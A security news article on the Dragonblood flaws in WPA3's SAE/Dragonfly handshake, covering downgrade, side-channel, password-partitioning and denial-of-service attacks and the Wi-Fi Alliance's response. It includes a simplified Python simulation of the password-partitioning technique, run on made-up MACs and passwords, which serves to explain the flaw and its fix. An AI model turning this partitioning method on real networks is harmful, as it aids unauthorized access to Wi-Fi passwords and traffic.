‘Dragonblood’ Flaws in WPA3 Allow Recovery of Wi-Fi Passwords

A series of vulnerabilities discovered by researchers in the WPA3 protocol can allow an attacker to obtain the password of a Wi-Fi network.

Officially launched in June 2018, the latest version of the Wi-Fi Protected Access (WPA) protocol is designed to provide better protection against offline dictionary attacks and password guessing attempts, improved security even when a less complex password is used, and forward secrecy to protect communications even if the password has been compromised.

WPA3, for which Personal and Enterprise variants are available, will gradually replace WPA2, but it will likely take several years until it’s widely adopted. In the meantime, WPA2 will continue to be maintained and improved.

Mathy Vanhoef of New York University Abu Dhabi and Eyal Ronen of Tel Aviv University and KU Leuven have analyzed WPA3, specifically the Simultaneous Authentication of Equals (SAE) handshake used by WPA3-Personal, which is built on the Dragonfly password-authenticated key exchange and is commonly referred to by that name. It’s worth noting that Vanhoef was one of the researchers who discovered the WPA2 vulnerabilities known as KRACK (Key Reinstallation Attack).

Vanhoef and Ronen’s analysis of WPA3 led to the discovery of two types of vulnerabilities, dubbed Dragonblood, that can be exploited to recover a Wi-Fi network’s password: ones that allow downgrade attacks and ones that can result in side-channel leaks. They have also uncovered a flaw that can be exploited to cause a denial-of-service (DoS) condition on an access point (AP) after bypassing the DoS protection mechanisms in WPA3.

“Our downgrade attack enables an adversary to force a client to partly execute WPA2’s 4-way handshake, which can subsequently be used to perform a traditional brute-force attack against the partial WPA2 handshake. Additionally, we also discovered downgrade attacks against the Dragonfly handshake itself, which can be abused to force a victim into using a weaker elliptic curve than it would normally use,” the researchers said.

“Our side-channel attacks target Dragonfly’s password encoding method. The cache-based attack exploits Dragonfly’s hash-to-curve algorithm, and our timing-based attack exploits the hash-to-group algorithm. The information that is leaked in these attacks can be used to perform a password partitioning attack, which is similar to a dictionary attack,” they explained.

According to the experts, these password partitioning attacks can be executed with $125-worth of Amazon EC2 computing power for an 8-character lowercase password. The CVE identifier CVE-2019-9494 has been assigned to the side-channel flaws.
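To make the side-channel and partitioning idea concrete, here is an added illustration written for this article; it is not the researchers' code or tooling. It models the Dragonfly "hunting and pecking" hash-to-curve loop in simplified form (HMAC-SHA256 for the seed and the x-coordinate derivation, NIST P-256 for the curve arithmetic; the real protocol's KDF and length handling are more involved). The point it shows is the one the paper exploits: the iteration at which a valid point is found depends only on the password and the two MAC addresses, both of which the attacker knows or controls. If a leaky implementation reveals that iteration, each attempt with a different spoofed client MAC lets the attacker discard every dictionary candidate that would have hit at a different iteration. The AP MAC, the spoofed client MACs, the victim password and the dictionary below are all constructed for the example.

```python
import hashlib
import hmac

# NIST P-256 parameters (one of the groups WPA3-Personal supports).  Used here
# only so the "is x on the curve?" test is real modular arithmetic.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b


def is_quadratic_residue(v: int) -> bool:
    """Euler's criterion: v is a square mod P iff v^((P-1)/2) == 1 (mod P)."""
    return pow(v, (P - 1) // 2, P) == 1


def hunt_and_peck(password: bytes, mac_a: bytes, mac_b: bytes, max_iter: int = 40):
    """Simplified Dragonfly hash-to-curve loop (assumption: HMAC-SHA256 in
    place of the protocol's exact seed/KDF construction).

    Returns (counter, x) for the first counter whose derived x lies on the
    curve, or None if none of max_iter counters works.  A constant-time
    implementation runs all max_iter rounds and keeps the first hit; a leaky
    one stops or branches at the hit, and that counter is what the cache- and
    timing-based side channels recover.
    """
    hi, lo = max(mac_a, mac_b), min(mac_a, mac_b)
    for counter in range(1, max_iter + 1):
        seed = hmac.new(b"\x00" * 32, hi + lo + password + bytes([counter]),
                        hashlib.sha256).digest()
        x = int.from_bytes(hmac.new(seed, b"SAE Hunting and Pecking",
                                    hashlib.sha256).digest(), "big")
        if x >= P:
            continue
        # Point is valid iff x^3 + A*x + B is a square mod P (then y exists).
        if is_quadratic_residue((pow(x, 3, P) + A * x + B) % P):
            return counter, x
    return None


def partition(dictionary, observations):
    """Password partitioning: keep only candidates consistent with every leak.

    observations: list of (mac_a, mac_b, leaked_counter) tuples, one per
    handshake the attacker measured against the same password.
    """
    candidates = list(dictionary)
    for mac_a, mac_b, leaked_counter in observations:
        kept = []
        for pw in candidates:
            hit = hunt_and_peck(pw, mac_a, mac_b)
            if hit is not None and hit[0] == leaked_counter:
                kept.append(pw)
        candidates = kept
    return candidates


# --- constructed demo data (not real devices or credentials) ---------------
AP_MAC = bytes.fromhex("0a1b2c3d4e5f")
VICTIM_PASSWORD = b"sunflower7"
DICTIONARY = [w.encode() for w in [
    "password", "sunflower7", "dragonfly", "letmein", "qwerty12", "hunter2",
    "wifi2018", "monkey", "welcome1", "iloveyou", "football", "princess",
    "baseball", "trustno1", "starwars", "whatever", "cheese", "summer19",
    "coffee99", "shadow", "master", "batman", "flower", "orange", "pepper",
    "silver", "ginger", "purple", "yellow", "tigger", "mustang", "zaq12wsx",
    "access", "hello123", "freedom", "secret", "matrix", "jordan23",
    "buster", "killer",
]]


def spoofed_client_mac(i: int) -> bytes:
    """The attacker controls its own MAC, so each attempt can use a new one."""
    return bytes([0x02, 0x00, 0x00, 0x00, 0x00, i])


def victim_observations(n: int = 16):
    """Simulate n leaky handshakes: what the side channel would hand over."""
    obs = []
    for i in range(1, n + 1):
        mac = spoofed_client_mac(i)
        counter, _ = hunt_and_peck(VICTIM_PASSWORD, AP_MAC, mac)
        obs.append((AP_MAC, mac, counter))
    return obs


OBSERVATIONS = victim_observations()


def run_demo():
    """Candidates that survive partitioning against all observations."""
    return partition(DICTIONARY, OBSERVATIONS)


if __name__ == "__main__":
    survivors = run_demo()
    print(f"{len(DICTIONARY)} candidates -> {len(survivors)} after "
          f"{len(OBSERVATIONS)} leaked iterations: {survivors}")
```

Each observation eliminates roughly two thirds of the remaining wrong candidates (the first-hit counter is geometrically distributed, so two unrelated passwords agree on it about a third of the time), which is why the cost the researchers quote scales with a handful of measured handshakes rather than with the full keyspace. The fix implementations adopted is to remove the password-dependent branch: run the loop a fixed number of times and select the result in constant time.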

An attacker who is in range of the targeted Wi-Fi network can obtain its password and gain access to sensitive information, such as passwords, emails, payment card numbers, and data sent via instant messaging applications, Vanhoef and Ronen said.

The researchers pointed out that these attacks also work against EAP-pwd, the Extensible Authentication Protocol (EAP) method that is built on the same Dragonfly handshake.

The experts have published a paper detailing their findings, along with some tools that can be used to launch attacks.

The Wi-Fi Alliance, the non-profit organization whose global network of members maintains Wi-Fi technology, says these vulnerabilities only impact “a limited number of early implementations of WPA3-Personal” and there is no evidence that they have been exploited for malicious purposes.

“WPA3-Personal is in the early stages of deployment, and the small number of device manufacturers that are affected have already started deploying patches to resolve the issues. These issues can all be mitigated through software updates without any impact on devices’ ability to work well together,” the organization said.


Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
